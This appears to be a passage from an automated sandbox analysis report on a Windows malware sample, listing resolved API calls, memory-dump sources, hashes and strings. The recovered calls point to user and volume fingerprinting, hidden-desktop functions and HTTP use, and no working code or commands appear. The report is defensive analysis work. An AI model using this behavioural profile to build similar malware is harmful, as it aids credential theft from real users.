                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 006A4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 886002cf45439fc0dc1f606bb9281369353079163417df95a7bc6155611c5b81
                                • Instruction ID: 2bd61410f68bce0149db2310edc41c62c5f18423a2449dabae11378fd2474d71
                                • Opcode Fuzzy Hash: 886002cf45439fc0dc1f606bb9281369353079163417df95a7bc6155611c5b81
                                • Instruction Fuzzy Hash: 3F31B319F82219678620EBEB4CA7B5F6F56FB85760B03406765A8DB381CDB15D00CAA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 006C2A8A
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 9abe1d2a9ab859855c4e26fd9ddbacbdbe6346727703949b73b01ee38ea3d3c0
                                • Instruction ID: cc4127643988ae0208bf932c56679022007ec9130b79c47b9fbeea378a7a1902
                                • Opcode Fuzzy Hash: 9abe1d2a9ab859855c4e26fd9ddbacbdbe6346727703949b73b01ee38ea3d3c0
                                • Instruction Fuzzy Hash: 62F0B4B1A41648EBC700DF88DD49F9EBBBCF704B21F00022AF915E3280D774190486A1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 6c66e0-6c66e7 634 6c66ed-6c6af9 GetProcAddress * 43 633->634 635 6c6afe-6c6b92 LoadLibraryA * 8 633->635 634->635 636 6c6c08-6c6c0f 635->636 637 6c6b94-6c6c03 GetProcAddress * 5 635->637 638 6c6c15-6c6ccd GetProcAddress * 8 636->638 639 6c6cd2-6c6cd9 636->639 637->636 638->639 640 6c6d4f-6c6d56 639->640 641 6c6cdb-6c6d4a GetProcAddress * 5 639->641 642 6c6d5c-6c6de4 GetProcAddress * 6 640->642 643 6c6de9-6c6df0 640->643 641->640 642->643 644 6c6df6-6c6f0b GetProcAddress * 12 643->644 645 6c6f10-6c6f17 643->645 644->645 646 6c6f8d-6c6f94 645->646 647 6c6f19-6c6f88 GetProcAddress * 5 645->647 648 6c6f96-6c6fbc GetProcAddress * 2 646->648 649 6c6fc1-6c6fc8 646->649 647->646 648->649 650 6c6fca-6c6ff0 GetProcAddress * 2 649->650 651 6c6ff5-6c6ffc 649->651 650->651 652 6c70ed-6c70f4 651->652 653 6c7002-6c70e8 GetProcAddress * 10 651->653 654 6c70f6-6c714d GetProcAddress * 4 652->654 655 6c7152-6c7159 652->655 653->652 654->655 656 6c716e-6c7175 655->656 657 6c715b-6c7169 GetProcAddress 655->657 658 6c7177-6c71ce GetProcAddress * 4 656->658 659 6c71d3 656->659 657->656 658->659
                                APIs
                                • GetProcAddress.KERNEL32(77190000,01326678), ref: 006C66F5
                                • GetProcAddress.KERNEL32(77190000,01326718), ref: 006C670D
                                • GetProcAddress.KERNEL32(77190000,013396B8), ref: 006C6726
                                • GetProcAddress.KERNEL32(77190000,01339748), ref: 006C673E
                                • GetProcAddress.KERNEL32(77190000,01339760), ref: 006C6756
                                • GetProcAddress.KERNEL32(77190000,0133D168), ref: 006C676F
                                • GetProcAddress.KERNEL32(77190000,0132A710), ref: 006C6787
                                • GetProcAddress.KERNEL32(77190000,0133D360), ref: 006C679F
                                • GetProcAddress.KERNEL32(77190000,0133D108), ref: 006C67B8
                                • GetProcAddress.KERNEL32(77190000,0133D330), ref: 006C67D0
                                • GetProcAddress.KERNEL32(77190000,0133D120), ref: 006C67E8
                                • GetProcAddress.KERNEL32(77190000,01326698), ref: 006C6801
                                • GetProcAddress.KERNEL32(77190000,01326738), ref: 006C6819
                                • GetProcAddress.KERNEL32(77190000,01326578), ref: 006C6831
                                • GetProcAddress.KERNEL32(77190000,013266B8), ref: 006C684A
                                • GetProcAddress.KERNEL32(77190000,0133D138), ref: 006C6862
                                • GetProcAddress.KERNEL32(77190000,0133D348), ref: 006C687A
                                • GetProcAddress.KERNEL32(77190000,0132A8F0), ref: 006C6893
                                • GetProcAddress.KERNEL32(77190000,01326778), ref: 006C68AB
                                • GetProcAddress.KERNEL32(77190000,0133D0F0), ref: 006C68C3
                                • GetProcAddress.KERNEL32(77190000,0133D318), ref: 006C68DC
                                • GetProcAddress.KERNEL32(77190000,0133D150), ref: 006C68F4
                                • GetProcAddress.KERNEL32(77190000,0133D180), ref: 006C690C
                                • GetProcAddress.KERNEL32(77190000,013266D8), ref: 006C6925
                                • GetProcAddress.KERNEL32(77190000,0133D2E8), ref: 006C693D
                                • GetProcAddress.KERNEL32(77190000,0133D2B8), ref: 006C6955
                                • GetProcAddress.KERNEL32(77190000,0133D210), ref: 006C696E
                                • GetProcAddress.KERNEL32(77190000,0133D198), ref: 006C6986
                                • GetProcAddress.KERNEL32(77190000,0133D078), ref: 006C699E
                                • GetProcAddress.KERNEL32(77190000,0133D240), ref: 006C69B7
                                • GetProcAddress.KERNEL32(77190000,0133D1B0), ref: 006C69CF
                                • GetProcAddress.KERNEL32(77190000,0133D258), ref: 006C69E7
                                • GetProcAddress.KERNEL32(77190000,0133D1C8), ref: 006C6A00
                                • GetProcAddress.KERNEL32(77190000,0132FE90), ref: 006C6A18
                                • GetProcAddress.KERNEL32(77190000,0133D1E0), ref: 006C6A30
                                • GetProcAddress.KERNEL32(77190000,0133D2D0), ref: 006C6A49
                                • GetProcAddress.KERNEL32(77190000,013266F8), ref: 006C6A61
                                • GetProcAddress.KERNEL32(77190000,0133D1F8), ref: 006C6A79
                                • GetProcAddress.KERNEL32(77190000,01326758), ref: 006C6A92
                                • GetProcAddress.KERNEL32(77190000,0133D0D8), ref: 006C6AAA
                                • GetProcAddress.KERNEL32(77190000,0133D270), ref: 006C6AC2
                                • GetProcAddress.KERNEL32(77190000,013267F8), ref: 006C6ADB
                                • GetProcAddress.KERNEL32(77190000,01326818), ref: 006C6AF3
                                • LoadLibraryA.KERNEL32(0133D228,006C051F), ref: 006C6B05
                                • LoadLibraryA.KERNEL32(0133D288), ref: 006C6B16
                                • LoadLibraryA.KERNEL32(0133D2A0), ref: 006C6B28
                                • LoadLibraryA.KERNEL32(0133D300), ref: 006C6B3A
                                • LoadLibraryA.KERNEL32(0133D090), ref: 006C6B4B
                                • LoadLibraryA.KERNEL32(0133D0A8), ref: 006C6B5D
                                • LoadLibraryA.KERNEL32(0133D0C0), ref: 006C6B6F
                                • LoadLibraryA.KERNEL32(0133D4B0), ref: 006C6B80
                                • GetProcAddress.KERNEL32(77040000,013263D8), ref: 006C6B9C
                                • GetProcAddress.KERNEL32(77040000,0133D3D8), ref: 006C6BB4
                                • GetProcAddress.KERNEL32(77040000,01339148), ref: 006C6BCD
                                • GetProcAddress.KERNEL32(77040000,0133D600), ref: 006C6BE5
                                • GetProcAddress.KERNEL32(77040000,013262F8), ref: 006C6BFD
                                • GetProcAddress.KERNEL32(74390000,0132A7D8), ref: 006C6C1D
                                • GetProcAddress.KERNEL32(74390000,01326318), ref: 006C6C35
                                • GetProcAddress.KERNEL32(74390000,0132A760), ref: 006C6C4E
                                • GetProcAddress.KERNEL32(74390000,0133D540), ref: 006C6C66
                                • GetProcAddress.KERNEL32(74390000,0133D648), ref: 006C6C7E
                                • GetProcAddress.KERNEL32(74390000,013262B8), ref: 006C6C97
                                • GetProcAddress.KERNEL32(74390000,01326418), ref: 006C6CAF
                                • GetProcAddress.KERNEL32(74390000,0133D660), ref: 006C6CC7
                                • GetProcAddress.KERNEL32(768D0000,01326338), ref: 006C6CE3
                                • GetProcAddress.KERNEL32(768D0000,013264F8), ref: 006C6CFB
                                • GetProcAddress.KERNEL32(768D0000,0133D378), ref: 006C6D14
                                • GetProcAddress.KERNEL32(768D0000,0133D5E8), ref: 006C6D2C
                                • GetProcAddress.KERNEL32(768D0000,013264D8), ref: 006C6D44
                                • GetProcAddress.KERNEL32(75790000,0132A4B8), ref: 006C6D64
                                • GetProcAddress.KERNEL32(75790000,0132A490), ref: 006C6D7C
                                • GetProcAddress.KERNEL32(75790000,0133D390), ref: 006C6D95
                                • GetProcAddress.KERNEL32(75790000,01326218), ref: 006C6DAD
                                • GetProcAddress.KERNEL32(75790000,01326518), ref: 006C6DC5
                                • GetProcAddress.KERNEL32(75790000,0132A878), ref: 006C6DDE
                                • GetProcAddress.KERNEL32(75A10000,0133D5B8), ref: 006C6DFE
                                • GetProcAddress.KERNEL32(75A10000,01326238), ref: 006C6E16
                                • GetProcAddress.KERNEL32(75A10000,01339108), ref: 006C6E2F
                                • GetProcAddress.KERNEL32(75A10000,0133D3A8), ref: 006C6E47
                                • GetProcAddress.KERNEL32(75A10000,0133D3C0), ref: 006C6E5F
                                • GetProcAddress.KERNEL32(75A10000,01326138), ref: 006C6E78
                                • GetProcAddress.KERNEL32(75A10000,01326258), ref: 006C6E90
                                • GetProcAddress.KERNEL32(75A10000,0133D558), ref: 006C6EA8
                                • GetProcAddress.KERNEL32(75A10000,0133D618), ref: 006C6EC1
                                • GetProcAddress.KERNEL32(75A10000,CreateDesktopA), ref: 006C6ED7
                                • GetProcAddress.KERNEL32(75A10000,OpenDesktopA), ref: 006C6EEE
                                • GetProcAddress.KERNEL32(75A10000,CloseDesktop), ref: 006C6F05
                                • GetProcAddress.KERNEL32(76850000,013261D8), ref: 006C6F21
                                • GetProcAddress.KERNEL32(76850000,0133D4C8), ref: 006C6F39
                                • GetProcAddress.KERNEL32(76850000,0133D3F0), ref: 006C6F52
                                • GetProcAddress.KERNEL32(76850000,0133D468), ref: 006C6F6A
                                • GetProcAddress.KERNEL32(76850000,0133D5A0), ref: 006C6F82
                                • GetProcAddress.KERNEL32(75690000,013263F8), ref: 006C6F9E
                                • GetProcAddress.KERNEL32(75690000,01326358), ref: 006C6FB6
                                • GetProcAddress.KERNEL32(769C0000,01326158), ref: 006C6FD2
                                • GetProcAddress.KERNEL32(769C0000,0133D570), ref: 006C6FEA
                                • GetProcAddress.KERNEL32(6F8C0000,01326298), ref: 006C700A
                                • GetProcAddress.KERNEL32(6F8C0000,013261F8), ref: 006C7022
                                • GetProcAddress.KERNEL32(6F8C0000,01326198), ref: 006C703B
                                • GetProcAddress.KERNEL32(6F8C0000,0133D528), ref: 006C7053
                                • GetProcAddress.KERNEL32(6F8C0000,013264B8), ref: 006C706B
                                • GetProcAddress.KERNEL32(6F8C0000,013262D8), ref: 006C7084
                                • GetProcAddress.KERNEL32(6F8C0000,01326178), ref: 006C709C
                                • GetProcAddress.KERNEL32(6F8C0000,01326378), ref: 006C70B4
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 006C70CB
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 006C70E2
                                • GetProcAddress.KERNEL32(75D90000,0133D408), ref: 006C70FE
                                • GetProcAddress.KERNEL32(75D90000,01339298), ref: 006C7116
                                • GetProcAddress.KERNEL32(75D90000,0133D438), ref: 006C712F
                                • GetProcAddress.KERNEL32(75D90000,0133D588), ref: 006C7147
                                • GetProcAddress.KERNEL32(76470000,01326278), ref: 006C7163
                                • GetProcAddress.KERNEL32(6D780000,0133D4E0), ref: 006C717F
                                • GetProcAddress.KERNEL32(6D780000,01326398), ref: 006C7197
                                • GetProcAddress.KERNEL32(6D780000,0133D5D0), ref: 006C71B0
                                • GetProcAddress.KERNEL32(6D780000,0133D420), ref: 006C71C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: f80a89b2101588bbf1b01ab0b9b2a090810878484e3e6c3364a5def1b19c205f
                                • Instruction ID: bbe7dea2d6d5606155cd852ceb382259fd70d9cb237ab2f28eec9b9ee49fedd4
                                • Opcode Fuzzy Hash: f80a89b2101588bbf1b01ab0b9b2a090810878484e3e6c3364a5def1b19c205f
                                • Instruction Fuzzy Hash: 5A620EB5613A00EFD754DF69FC98A2637BAF7886413148B1BE995D3364EA34AC00DF60
                                APIs
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF1D5
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF1F1
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF1FC
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF215
                                • lstrlen.KERNEL32(006CCFEC), ref: 006BF220
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF239
                                • lstrcpy.KERNEL32(00000000,006D4FA0), ref: 006BF25E
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF28C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF2C0
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006BF2F0
                                • lstrlen.KERNEL32(01326538), ref: 006BF315
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: d4c733791a8bcebfed255d871c6d48800cccf7fd560fe49d5d38ea4a57111797
                                • Instruction ID: 2ef702568a331b2bb0f36bc57dcd4a2e3d66778e3fbf3a28643d89573fd512c2
                                • Opcode Fuzzy Hash: d4c733791a8bcebfed255d871c6d48800cccf7fd560fe49d5d38ea4a57111797
                                • Instruction Fuzzy Hash: D4A22DB09012169FCB60EF69D854A9AB7F6BF45310B18817EE849DB361EB35DC81CB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0013
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C00BD
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C00E1
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C00EC
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0110
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C011B
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C013F
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C015A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0189
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C0194
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C01C3
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C01CE
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0206
                                • lstrlen.KERNEL32(006CCFEC), ref: 006C0250
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C0288
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C059B
                                • lstrlen.KERNEL32(01326558), ref: 006C05AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C05D7
                                • lstrcat.KERNEL32(00000000,?), ref: 006C05E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C060E
                                • lstrlen.KERNEL32(0133EE30), ref: 006C0625
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C064C
                                • lstrcat.KERNEL32(00000000,?), ref: 006C0658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C0681
                                • lstrlen.KERNEL32(013265B8), ref: 006C0698
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C06C9
                                • lstrcat.KERNEL32(00000000,?), ref: 006C06D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006C0706
                                • lstrcpy.KERNEL32(00000000,01339128), ref: 006C074B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C077F
                                • lstrcpy.KERNEL32(00000000,0133EBD8), ref: 006C07E7
                                • lstrcpy.KERNEL32(00000000,013393B8), ref: 006C0858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 006C08CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C0928
                                • lstrcpy.KERNEL32(00000000,01339358), ref: 006C09F8
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A2528
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A254E
                                  • Part of subcall function 006A24E0: lstrcpy.KERNEL32(00000000,?), ref: 006A2577
                                • lstrcpy.KERNEL32(00000000,01339378), ref: 006C0ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006C0B81
                                • lstrcpy.KERNEL32(00000000,01339378), ref: 006C0D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: a6c8c2da91ef4b5b6fd07d2eeacb2583acbe17470a75e045adb4d93b67b2c50a
                                • Instruction ID: b616f9315795230295ccb0a0bbe44f0f5e693889d942573d2d347e43a34259c1
                                • Opcode Fuzzy Hash: a6c8c2da91ef4b5b6fd07d2eeacb2583acbe17470a75e045adb4d93b67b2c50a
                                • Instruction Fuzzy Hash: 91E22870A05341CFD764EF29C494BAAB7E2FF8A314F58856ED48D8B352DB359841CB42
                                APIs
                                • lstrlen.KERNEL32(01326538), ref: 006BF315
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF47B
                                • lstrcpy.KERNEL32(00000000,01326538), ref: 006BF4BB
                                • lstrcpy.KERNEL32(00000000,01339208), ref: 006BF4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006BF61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BF718
                                • lstrlen.KERNEL32(01339188), ref: 006BF746
                                • lstrcpy.KERNEL32(00000000,01339188), ref: 006BF771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BF793
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BF7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 006BFA32
                                • lstrlen.KERNEL32(01339228), ref: 006BFA60
                                • lstrcpy.KERNEL32(00000000,01339228), ref: 006BFA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006BFAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BFAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: b81102f47d19557df8e31eb0598327eb4c988b63d0427c6a89049079105a25c9
                                • Instruction ID: ac9a0a4267507a617566feb1ec9a8c2dc9686c583e65484b2e253a02cac05952
                                • Opcode Fuzzy Hash: b81102f47d19557df8e31eb0598327eb4c988b63d0427c6a89049079105a25c9
                                • Instruction Fuzzy Hash: 48F12CB0A02212CFDB64DF29D854AD9B7E6BF44314B1981BED4499B372DB35DC82CB40

                                Control-flow Graph
                                [Graph image not reproduced in text. Entry block 6b8ca0; API calls shown in the graph: StrCmpCA, ExitProcess, lstrlen, lstrcpy; subcalls to 6a2a20 and 6a2930.]
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 394a5bec928aef04a0c2eb92a570432e75a80da9744de295e701e5476f06159d
                                • Instruction ID: 2b4e288506fe686f32e5e00afc4961eb952efdea7e878aa699272794b9468966
                                • Opcode Fuzzy Hash: 394a5bec928aef04a0c2eb92a570432e75a80da9744de295e701e5476f06159d
                                • Instruction Fuzzy Hash: 05513EB1A09701EFC720AF65DD88AAB7BFABB54700B10481EE542D3611DF74D982CF61

                                Control-flow Graph
                                [Graph image not reproduced in text. Entry block 6c2740; API calls shown in the graph: GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA; subcall to 6c71e0.]
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 006C277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,006B93B6,00000000,00000000,00000000,00000000), ref: 006C27AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2816
                                • wsprintfA.USER32 ref: 006C283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: 5e7956642729e4f8b73c8a025370551e44d6396021726c7dcc34e02a264ed51f
                                • Instruction ID: 599925670229f0b181b43bd1e15561811842acb42af225f4aaa90a7033d3f297
